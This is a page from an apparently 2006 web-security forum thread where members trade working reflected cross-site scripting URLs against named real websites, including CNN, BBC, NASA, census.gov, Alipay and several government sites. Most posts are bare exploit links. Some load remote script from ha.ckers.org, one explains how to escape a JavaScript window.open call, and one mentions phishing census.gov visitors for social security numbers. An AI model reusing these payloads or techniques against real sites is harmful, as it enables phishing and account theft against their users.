Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: Previous1234567891011...LastNext
Current Page: 6 of 65
Re: So it begins
Posted by: rsnake
Date: September 24, 2006 09:14PM

Kyran, it's now located at http://ha.ckers.org/s.js :)

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 24, 2006 09:15PM

Here is a good example of my post earlier regarding <style> tags disallowing the rest of the page to show.

http://www.codemasters.com/search/index.php?search_string=%22%3C/title%3E%3Cscript%20src=http://ha.ckers.org/xss.js%3E%3C/script%3E%3Cstyle%3E&submitsearch=true&submitsearch_x=0&submitsearch_y=0&territory=EnglishUSA


This is without the style tag.

http://www.codemasters.com/search/index.php?search_string=%22%3C/title%3E%3Cscript%20src=http://ha.ckers.org/xss.js%3E%3C/script%3E&submitsearch=true&submitsearch_x=0&submitsearch_y=0&territory=EnglishUSA

But of course, if there is a closing style tag everything after it will still show.


Edit - Thanks for that rsnake! :D

- Kyran



Edited 1 time(s). Last edit at 09/24/2006 09:22PM by Kyran.

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 24, 2006 10:22PM

http://www.cbs.com/excedrin/register.php?mpid=2691&success_page=thankyou.php&action=create&login=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&password=&password2=&firstname=&lastname=&address1=&city=&state=&zip=&country=&birthdate=%2F%2F&birthmonth=&birthday=&birthyear=&phone=&email=&previous_email=&ireadtherules=&Submit=Submit

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 24, 2006 10:44PM

http://rzr.online.fr/docs/search/redir.php?url=a</title><script>alert(String.fromCharCode(88,83,83))</script>
http://www.nationalcrediteducationweek.com/redirect.aspx?redir=delayedXSS';alert('XSS');t%20=' <--delayed xss by 5seconds..
http://www.nscp.org/cgi-bin/leave.pl?redir=google.com/<script>alert('XSS')</script> xss then redirect.. although can be overwritten if you want
http://www.dmas.virginia.gov/pr-provider_no.asp?redir=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cb

-maluc



Edited 3 time(s). Last edit at 09/25/2006 12:13AM by maluc.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 24, 2006 11:52PM

http://www.innovations.va.gov/innovations/docs/notva.cfm?redir=');%7Dalert('XSS');if(1==0)%7B//

this is a rather interesting javascript injection: ');}alert('XSS');if(1==0){//

the function it's injected into looks like:

function openClose(){
window.open('http://INPUTHERE','');
window.close();
}

the '); breaks out of the window.open .. and since this function is only called when pressing the "continue" button .. the } breaks out of the function. Then any javascript can freely be added, but we need to clean up the remainder:

,'');
window.close();
}

The .''); is commented out using the // .. and the { to match the right-hand bracket. The script now works, but if we don't want it to close immediately (because of window.close), we can use an impossible condition to prevent it - the if(1==0){ }

it's nothing difficult, just funky looking

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 25, 2006 12:01AM

Hah. That's quite neat.

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 25, 2006 01:47AM

http://robotics.nasa.gov/rcc/redirect.php?url=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E%3C/b
http://www.opic.gov/leaving.asp?url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C/b
https://ask.census.gov/cgi-bin/askcensus.cfg/php/enduser/std_alp.php?p_sid=5tkbkvii&p_lva=&p_li=&p_page=1&p_cv=&p_pv=&p_prods=&p_cats=&p_hidden_prods=&p_search_text=a%22%3CMETA+HTTP-EQUIV%3D%22refresh%22+CONTENT%3D%220%3Burl%3Djavascript%3Aalert%28%27XSS%27%29%3B%22%3E&p_new_search=1 <--the " gets translated to &quot; in IE only (tested on IE7 though).. works fine in Firefox

someone less tired than i, can do more testing to see where i'm screwing up.. census.gov is a great excuse to ask people for their social security numbers, etc. ..

-maluc



Edited 2 time(s). Last edit at 09/25/2006 03:47AM by maluc.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 25, 2006 01:55AM

http://columbiaredi.com/redirect.php?url='%20onmouseover=alert('XSS')%20style='-moz-binding:url(http://ha.ckers.org/xssmoz.xml%23xss)%27 mouseover the Continue link in IE .. auto in FF

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 25, 2006 03:08AM

http://www.dotcr.ost.dot.gov/asp/redirect.asp?url=zomg%20XSS%3Cscript%3Ealert('XSS')%3C/script%3E <--need to overwrite meta to prevent redirect
http://www.mbda.gov/redirect.php?url='%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C/b

-maluc



Edited 1 time(s). Last edit at 09/25/2006 03:23AM by maluc.

Options: ReplyQuote
Re: So it begins
Posted by: dyn0
Date: September 25, 2006 10:19AM

http://www.friendsreunited.co.uk/FriendsReunited.asp?wci=forgotton&member_email=%3Cimg%20src=%22http://0xdeadface.co.uk/richard.jpg%22/%3E&error=Y

Options: ReplyQuote
Re: So it begins
Posted by: dyn0
Date: September 25, 2006 10:19AM

http://www.salford.gov.uk/search.htm?col=justhtml&qt=%3Cimg%20src=%22http://0xdeadface.co.uk/richard.jpg%22/%3E

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 25, 2006 11:45AM

We've been slashdotted! Sneaky bastards deep linking to .php files! http://it.slashdot.org/it/06/09/25/1440220.shtml Performance has degraded massively... Expect some outages today... sorry about that folks!

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 25, 2006 12:19PM

The darkreading article has been syndicated on Doctor Dobb's journal as well: http://www.ddj.com/dept/security/193005254

Keep up the good work guys!

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 25, 2006 12:49PM

Borrowed from Maluc's redirect list and turned into XSS: http://www.freeml.com/servlet/redir?rd=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ehttp://www.test.com

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 25, 2006 03:52PM

Nice! Slashdotted.

rsnake, that last one is mean. Even if scripts are disabled it auto-refreshes over and over.

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 25, 2006 03:57PM

That's easy to get rid of if you want, I just didn't bother as a POC. :)

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 25, 2006 04:13PM

I would assume using javascript to edit it? I can't see any html way to do so.

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 25, 2006 04:24PM

Yah, not using this example (since there is some logic built into it to stop this) but if you redirect to #whatever I don't think meta refresh will cause the whole thing to re-load since whateverpageyouon.html#whatever causes the page to refresh. But you're right I was talking about using document.write or a javascript: directive.

Options: ReplyQuote
Re: So it begins
Posted by: kirke
Date: September 25, 2006 04:38PM

ddj.com and darkreading.com listed the companies, probably siteadvisor.com needs to change their "green" to "red" for those. Try yourself:

http://www.siteadvisor.com/lookup/?q='%20onmouseover=%22alert('want%20to%20add%20whatever%20you%20like')%22%3E

currently a bit anoying 'cause you have to use your mouse, but works anyway ;-)

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 25, 2006 04:48PM

*sigh* You have a very good point (funny XSS but very real issue). But how can they really analyize these types of sites without taking into account XSS based phishing attacks?

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: kirke
Date: September 25, 2006 05:01PM

.. if you manage to inject an iframe .. or loading into the DOM ..

Options: ReplyQuote
Re: So it begins
Posted by: kirke
Date: September 25, 2006 05:03PM

outch:

http://www.breach.com/news_press_detail.asp?id=42-0

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 25, 2006 05:03PM

Both are trivial if you have JavaScript on the page already. I wonder what tools they use to vett these websites... It seems like they are mostly worried about distribution of malware or spam, both of which could happen via XSS defacement/phishing.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 25, 2006 05:45PM

http://audience.cnn.com/services/cnn/memberservices/member_auth.jsp?url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 25, 2006 05:51PM

http://www.bbc.co.uk/cgi-perl/signon/mainscript.pl?c=login&service=mbhealth&ptrt=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 25, 2006 05:57PM

Big auction site in China: http://search1.taobao.com/browse/0/t-g,ei7dy43dojuxa5b6mfwgk4tufarfqu2teiutyl3tmnzgs4duhy----------------40-list-commend-0-all-0.htm

And their payment processor: https://www.alipay.com/user/user_register.htm?support=000000&_fmu.u._0.e=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&_fmu.u._0.e=&_fmu.u._0.q=&_fmu.u._0.qu=&_fmu.u._0.pa=&_fmu.u._0.pay=&_fmu.u._0.p=%CE%D2%B0%D6%B0%D6%C2%E8%C2%E8%B5%C4%C3%FB%D7%D6%B8%F7%CA%C7%CA%B2%C3%B4&_fmu.u._0.o=&_fmu.u._0.pr=&_fmu.u._0.u=2&_fmu.u._0.f=&_fmu.u._0.r=&_fmu.u._0.ca=%C9%ED%B7%DD%D6%A4&_fmu.u._0.car=&_fmu.u._0.c=&_fmu.u._0.re=alipay&action=register_action&event_submit_do_register=anything&Submit=%CD%AC%D2%E2%D2%D4%CF%C2%CC%F5%BF%EE%A3%AC%B2%A2%C8%B7%C8%CF%D7%A2%B2%E1

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 25, 2006 06:18PM

http://www.clickbank.com/marketplace.html?method=Sort&s=&c=-1&subc=-1&keywords=%22%3E%3Cscript%3Ealert+%28%27xss%27%29%3C%2Fscript%3E&sortBy=popularity&i=10

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: Acidus
Date: September 25, 2006 09:34PM

This is just silly. You search for XSS, you XSS them
http://www.altavista.com/web/results?&q=%3C%2Ftitle%3E%3Cscript%3Ealert%28%22Ownage+by+Acidus%22%29%3C%2Fscript%3E

Acidus

--
Most Significant Bit Labs
http://www.msblabs.org

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: September 25, 2006 10:06PM

http://search.netscape.com/ns/search?query=%27%29%3Balert%28%27xss&st=webresults&fromPage=NSCPResultsT

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: So it begins
Posted by: Acidus
Date: September 25, 2006 10:08PM

Another CNN issue. Multiple reflections for a single attack string, so if you seriously exploit it you'll need to put in a variable flag

http://audience.cnn.com/services/cnn/memberservices/member_register.jsp?url=%22%3E%3Cscript%3Ealert(%220wnage%20by%20Acidus%22)%3C/script%3E

Acidus

--
Most Significant Bit Labs
http://www.msblabs.org

Options: ReplyQuote
Pages: Previous1234567891011...LastNext
Current Page: 6 of 65


Sorry, only registered users may post in this forum.